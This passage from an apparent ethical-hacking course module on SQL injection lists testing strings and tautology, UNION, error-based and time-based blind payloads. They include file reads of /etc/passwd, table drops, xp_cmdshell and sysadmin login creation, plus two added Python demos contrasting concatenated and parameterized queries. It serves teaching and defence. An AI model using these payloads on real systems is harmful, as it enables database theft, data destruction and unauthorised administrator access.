    );[SQL Statement];#

  Comment variation:
    1/*comment*/

  FIGURE 14.11: Testing for SQL Injection
  • 45. Testing for SQL Injection (Cont'd)

  Additional testing strings used to test for SQL injection include:

    ' or 1=1--
    " or 1=1--
    ' OR 1=1--
    OR 1=1
    ' or 1=1/*
    ' or 1/*
    Admin' OR '
    ' OR '1'='1
    ; OR '1'='1'
    " or "a"="a
    ' OR 2 > 1
    ' OR 2 BETWEEN 1 and 3
    ' OR 'text' = N'text'
    ' OR 'text' > 't'
    ' OR 'unusual' = 'unusual'
    ' OR 'something' = 'some'+'thing'
    ' OR 'something' like 'some%'
    ' OR 'whatever' in ('whatever')
    ' or username like char(37);
    ' group by userid having 1=1--
    ' having 1=1--
    ' or 1 in (select @@version)--
    ' union all select @@version--
    ' union select
    ' union select * from users where login = char(114,111,111,116);
    ' union select 1,load_file('/etc/passwd'),1,1,1;
    UNI/**/ON SEL/**/ECT
    /**/OR/**/1/**/=/**/1
    '; EXEC ('SEL' + 'ECT US' + 'ER')
    '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
    ' and 1 in (select var from temp)--
    '; drop table temp --
    @var select @var as var into temp end --
    exec master..xp_cmdshell 'ping 10.10.1.2'--
    exec sp_addlogin 'name', 'password'
    exec sp_addsrvrolemember 'name', 'sysadmin'
    CREATE USER name IDENTIFIED BY 'pass123'
    GRANT CONNECT TO name; GRANT RESOURCE TO name;
    Password:*/=1--
    %27+--+
    %27+OR+%277659%27%3D%277659
    %22+or+isnull%281%2F0%29+%2F*
    +or+isnull%281%2F0%29+%2F*

  FIGURE 14.12: Additional Testing Strings
  • 46. Module Flow

  So far, we have discussed various SQL injection concepts and how to test web applications for SQL injection. Now we will discuss various types of SQL injection. SQL injection attacks are performed in many different ways by poisoning the SQL query, which is used to access the database.

    - SQL Injection Concepts
    - Testing for SQL Injection
    - Types of SQL Injection
    - Blind SQL Injection
    - SQL Injection Methodology
    - Advanced SQL Injection
    - SQL Injection Tools
    - Evasion Techniques
    - Countermeasures

  • 47. This section gives insight into the different ways to handle SQL injection attacks. Some simple SQL injection attacks, including blind SQL injection attacks, are explained with the help of examples.
  • 48. Types of SQL Injection

  The following are the various types of SQL injection:

  SQL Injection
  SQL injection is an attack in which malicious code is injected through a SQL query, which can read the sensitive data and can even modify (insert/update/delete) the data. SQL injection is mainly classified into two types:

  Blind SQL Injection
  Wherever there is a web application vulnerability, blind SQL injection can be used either to access the sensitive data or to destroy the data. The attacker can steal the data by asking a series of true or false questions through SQL statements.

  Simple SQL Injection
  A simple SQL injection script builds a SQL query by concatenating hard-coded strings together with a string entered by the user. Simple SQL injection is again divided into two types:

    - UNION SQL Injection: UNION SQL injection is used when the user uses the UNION command. The attacker checks for the vulnerability by adding a tick to the end of a ".php?id=" file.
  • 49.
    - Error Based SQL Injection: The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request.
  • 50. Simple SQL Injection Attacks

  A simple SQL injection script builds an SQL query by concatenating hard-coded strings together with a string entered by the user. The following are the various elements associated with simple SQL injection attacks:

  System Stored Procedure: Attackers exploit databases' stored procedures to perpetrate their attacks.

  End of Line Comment: After injecting code into a particular field, legitimate code that follows is nullified through the use of end of line comments.

    SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --

  Illegal/Logically Incorrect Query: An attacker may gain knowledge by injecting illegal/logically incorrect requests such as injectable parameters, data types, names of tables, etc.

  Tautology: Injecting statements that are always true so that queries always return results upon evaluation of a WHERE condition.

    SELECT * FROM users WHERE name = '' OR '1'='1';

  • 51. Union Query: The "UNION SELECT" statement returns the union of the intended dataset with the target dataset.

    SELECT Name, Phone, Address FROM Users WHERE Id=1 UNION ALL SELECT creditCardNumber, 1, 1 FROM CreditCardTable
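  To make the tautology and end-of-line comment concrete, and to show the countermeasure beside the weakness, here is an added example (not part of the course material or EC-Council's code) using Python's built-in sqlite3 module against a constructed users table. The first lookup splices the user-supplied name into the SQL text exactly as a simple SQL injection script does; the second passes it as a bound parameter. The same tautology string returns every row from the first and nothing from the second.

```python
import sqlite3


def make_sample_db():
    """In-memory table with constructed rows (assumption: not the course's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone TEXT, address TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "555-0100", "1 Main St"), ("bob", "555-0101", "2 High St")],
    )
    return conn


def lookup_concatenated(conn, name):
    """Vulnerable form: the value becomes part of the SQL text, so a quote, OR and
    an end-of-line comment inside `name` are parsed as SQL by the database."""
    sql = "SELECT name, phone, address FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """Hardened form: the value is bound to the placeholder and never parsed as
    SQL, so a tautology string is just a name that matches no row."""
    sql = "SELECT name, phone, address FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Tautology payload from the module; the trailing comment discards the closing
# quote the application appends, so the statement stays syntactically valid.
TAUTOLOGY = "' OR '1'='1' --"

if __name__ == "__main__":
    db = make_sample_db()
    print(lookup_concatenated(db, "alice"))     # one row
    print(lookup_concatenated(db, TAUTOLOGY))   # both rows: WHERE clause is always true
    print(lookup_parameterized(db, TAUTOLOGY))  # []: payload treated as a literal name
```

  The concatenated query that the database actually sees for the tautology is `SELECT ... WHERE name = '' OR '1'='1' --'`, which is the same shape as the tautology statement shown above; the parameterized version sends `WHERE name = ?` and the payload separately, so no amount of quoting in the input changes the query structure.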
  • 52. Union SQL Injection Example

  UNION SQL injection is used when the user uses the UNION command. The user checks for the vulnerability by adding a tick to the end of a ".php?id=" file. If it comes back with a MySQL error, the site is most likely vulnerable to UNION SQL injection. They proceed to use ORDER BY to find the columns, and at the end, they use the UNION ALL SELECT command.

  Extract Database Name
  This is the example of union SQL injection in which an attacker tries to extract a database name.

    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,DB_NAME,3,4--
    [DB_NAME]   Returned from the server

  Extract Database Tables
  This is the example of union SQL injection that an attacker uses to extract database tables.

    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)--
    [EMPLOYEE_TABLE]   Returned from the server

  Extract Table Column Names
  This is the example of union SQL injection that an attacker uses to extract table column names.

  • 53.
    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,column_name,3,4 from DB_NAME.information_schema.columns where table_name='EMPLOYEE_TABLE'--
    [EMPLOYEE_NAME]   Returned from the server

  Extract 1st Field Data
  This is the example of union SQL injection that an attacker uses to extract field data.

    http://juggyboy.com/page.aspx?id=1 UNION SELECT ALL 1,COLUMN-NAME-1,3,4 from EMPLOYEE_NAME --
    [FIELD 1 VALUE]   Returned from the server
  • 54. SQL Injection Error Based

  The attacker makes use of the database-level error messages disclosed by an application. This is very useful to build a vulnerability exploit request. There are even chances of automated exploits based on the different error messages generated by the database server.

  Extract Database Name
  The following is the code to extract the database name through the SQL injection error-based method:

    http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(DB_NAME))--
    Syntax error converting the nvarchar value '[DB NAME]' to a column of data type int.

  Extract 1st Database Table
  The following is the code to extract the first database table through the SQL injection error-based method:

  • 55.
    http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))--
    Syntax error converting the nvarchar value '[TABLE NAME 1]' to a column of data type int.

  Extract 1st Table Column Name
  The following is the code to extract the first table column name through the SQL injection error-based method:

    http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name='TABLE-NAME-1'))--
    Syntax error converting the nvarchar value '[COLUMN NAME 1]' to a column of data type int.

  Extract 1st Field of 1st Row (Data)
  The following is the code to extract the first field of the first row (data) through the SQL injection error-based method:

    http://juggyboy.com/page.aspx?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))--
    Syntax error converting the nvarchar value '[FIELD 1 VALUE]' to a column of data type int.
  • 56. Module Flow

  Previously we discussed various types of SQL injection attacks. Now, we will discuss each type of SQL injection attack in detail. Let us begin with the blind SQL injection attack. Blind SQL injection is a method that is implemented by the attacker when any server responds with any error message stating that the syntax is incorrect.

    - SQL Injection Concepts
    - Testing for SQL Injection
    - Types of SQL Injection
    - Blind SQL Injection
    - SQL Injection Methodology
    - Advanced SQL Injection
    - SQL Injection Tools
    - Evasion Techniques
    - Countermeasures

  • 57. This section introduces and gives a detailed explanation of blind SQL injection attacks.
  • 58. What Is Blind SQL Injection?

  Blind SQL injection is used when a web application is vulnerable to SQL injection. In many aspects, SQL injection and blind injection are the same, but there are slight differences. SQL injection depends on error messages, but blind injections are not dependent on error messages. Wherever there is a web application vulnerability, blind SQL injection can be used either to access the sensitive data or to destroy the data. Attackers can steal the data by asking a series of true or false questions through SQL statements. Results of the injection are not visible to the attacker. This is also more time consuming because every time a new bit is recovered, a new statement has to be generated.
  • 59. No Error Messages Returned

  In this attack, the attacker tries to perform SQL injection using a query such as "JuggyBoy'; drop table Orders --". In simple SQL injection, the server throws an error message with a detailed explanation of the error, including database driver and ODBC SQL Server details; in blind SQL injection, however, the error message only says that there is an error and the request was unsuccessful, without any details.

    Input: JuggyBoy'; drop table Orders --

    Simple SQL Injection:
      Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
      [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
      /shopping/buy.aspx, line 52

    Blind SQL Injection (Attack Successful): no error details returned

  FIGURE 14.13: No Error Messages Returned
  • 60. Blind SQL Injection: WAITFOR DELAY YES or NO Response. Since no error messages are returned, use the WAITFOR DELAY command to check the SQL execution status. Step 1: inject ; IF EXISTS (SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'--. Step 2: this checks whether "creditcard" (the table the query selects from) exists or not. Step 3: If NO, the page immediately displays "We are unable to process your request. Please try back later". Step 4: If YES, the server sleeps for 10 seconds and only then displays "We are unable to process your request. Please try back later". WAITFOR DELAY 'time' (seconds): this is just like sleep; it waits for the specified time and is a CPU-safe way to make a database wait, for example WAITFOR DELAY '0:0:10'--. BENCHMARK() (minutes): this command runs on MySQL Server and takes the form BENCHMARK(howmanytimes, do this).
  • 61. Figure 14.14: WAITFOR DELAY YES or NO Response. Injected statement: ; IF EXISTS (SELECT * FROM creditcard) WAITFOR DELAY '0:0:10'--. Since no error messages are returned, the 'waitfor delay' command is used to check the SQL execution status: in both the YES and the NO case the page shows only "Oops! We are unable to process your request. Please try back later.", and the only difference is the 10-second delay.
  • 62. Blind SQL Injection Exploitation (MySQL). SQL injection exploitation depends on the SQL dialect of the database in use. An attacker merges two SQL queries to get more data and tries to exploit the UNION operator to easily get more information from the database management system. Blind injections help an attacker bypass more filters easily. One of the main differences in blind SQL injection is that entries are read symbol by symbol.
  Searching for the first character of the first table entry:
  /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),1,1))=97,555,777)
  If the table "users" contains a column "pass" and the first character of the first entry in this column is 97 (letter "a"), then the DBMS returns TRUE; otherwise, FALSE.
  Searching for the second character of the first table entry:
  /?id=1+AND+555=if(ord(mid((select+pass+from+users+limit+0,1),2,1))=97,555,777)
  If the table "users" contains a column "pass" and the second character of the first entry in this column is 97 (letter "a"), then the DBMS returns TRUE; otherwise, FALSE.
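To see why the probe on this slide works only against a query built by string concatenation, here is an added example (not code from the CEH module) that runs the same yes/no question against an in-memory SQLite database. The MySQL form if(ord(mid(...))=97,555,777) is rewritten in SQLite syntax as CASE WHEN unicode(substr(...))=97 THEN 555 ELSE 777 END; the users and items tables and the password 'apple123' are constructed for the demo.

```python
"""Vulnerable vs. parameterized lookup, run against an in-memory SQLite DB.

Added example (not from the CEH module). The schema, the row contents and
the SQLite rewrite of the slide's MySQL probe are all constructed here.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed toy schema: one user whose password starts with 'a' (code 97)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pass TEXT);"
        "INSERT INTO users VALUES (1, 'alice', 'apple123');"
        "CREATE TABLE items (id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO items VALUES (1, 'first item');"
    )
    return conn


# The slide's MySQL probe  if(ord(mid(...))=97,555,777)  in SQLite syntax.
# It asks one yes/no question: is character {pos} of the first password equal
# to ASCII {code}?  A true guess yields 555=555 and keeps the row; a false
# guess yields 555=777 and drops it.
PROBE = (
    "1 AND 555=(CASE WHEN unicode(substr((SELECT pass FROM users LIMIT 1),{pos},1))={code} "
    "THEN 555 ELSE 777 END)"
)


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """Defect under discussion: the id parameter is concatenated into the SQL text."""
    sql = "SELECT title FROM items WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: the id is bound as a value, so it is never parsed as SQL."""
    return [row[0] for row in conn.execute("SELECT title FROM items WHERE id = ?", (raw_id,))]


def oracle_visible(conn: sqlite3.Connection, lookup) -> bool:
    """Does this lookup leak a bit?  Compare the response to a true guess
    (first character is 'a', code 97) with the response to a false one (98)."""
    true_guess = lookup(conn, PROBE.format(pos=1, code=97))
    false_guess = lookup(conn, PROBE.format(pos=1, code=98))
    return true_guess != false_guess


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_parameterized)):
        print(f"{name:14s} normal id=1 -> {fn(db, '1')}  oracle visible: {oracle_visible(db, fn)}")
```

The vulnerable lookup answers the code-97 probe with a row and the code-98 probe with nothing, which is exactly the one-bit oracle the slide describes; the parameterized lookup returns nothing for either, because the whole injected string is compared against id as a value. On MySQL or SQL Server the remedy is the same: bind parameters (or cast id to its numeric type) instead of concatenating request data into the statement.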
  • 63. Blind SQL Injection - Extract Database User. Finding a full user name of 8 characters using the binary search method takes 56 requests.
  Check for username length:
  http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'--
  Check if the 1st character in the username is 'a' (a=97), 'b', or 'c', etc.:
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  Check if the 2nd character in the username is 'a' (a=97), 'b', or 'c', etc.:
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=97) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),2,1)))=99) WAITFOR DELAY '00:00:10'--
  Check if the 3rd character in the username is 'a' (a=97), 'b', or 'c', etc.:
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=97) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=98) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((USER),3,1)))=99) WAITFOR DELAY '00:00:10'--
  In the blind SQL injection method, the attacker can extract the database user name by probing the database server with yes/no questions and timing the answers. Finding the first letter of a user name with a binary search takes 7 requests, and an 8-character-long name takes 56 requests.
  • 64. Figure 14.15: Extract Database User (the username length and 1st, 2nd and 3rd character probes shown on the previous slide).
  • 65. Blind SQL Injection - Extract Database Name.
  Check for database name length and name:
  http://juggyboy.com/page.aspx?id=1; IF (LEN(DB_NAME())=4) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=97) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=98) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=99) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=100) WAITFOR DELAY '00:00:10'--
  Database Name = ABCD
  Extract 1st database table:
  http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=3) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY '00:00:10'--
  Table Name = EMP
  In the blind SQL injection method, the attacker can extract the database name using the time-based blind SQL injection method. Here, the attacker brute-forces the database name character by character: he or she notes the time before sending the query and the time after the response arrives, and judges from the difference that if the time lapse is 10 seconds, the character can be 'A'; otherwise, if it took 2 seconds, it can't be 'A'.
  • 66. Figure 14.16: Extract Database Name (the database name and first table probes shown on the previous slide).
  • 67. Blind SQL Injection - Extract Column Name.
  Extract 1st table column name:
  http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP')=3) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),1,1)))=101) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),2,1)))=105) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP'),3,1)))=100) WAITFOR DELAY '00:00:10'--
  Column Name = EID
  Extract 2nd table column name:
  http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP' and column_name>'EID')=4) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP' and column_name>'EID'),1,1)))=100) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP' and column_name>'EID'),2,1)))=101) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP' and column_name>'EID'),3,1)))=112) WAITFOR DELAY '00:00:10'--
  http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from ABCD.information_schema.columns where table_name='EMP' and column_name>'EID'),4,1)))=116) WAITFOR DELAY '00:00:10'--
  Column Name = DEPT
  In the blind SQL injection method, the attacker can extract the column names using different brute force methods or tools, with which he or she checks for the first table column name and then, by adding the condition column_name>'EID', for the second. Figure 14.17: Extract Database User.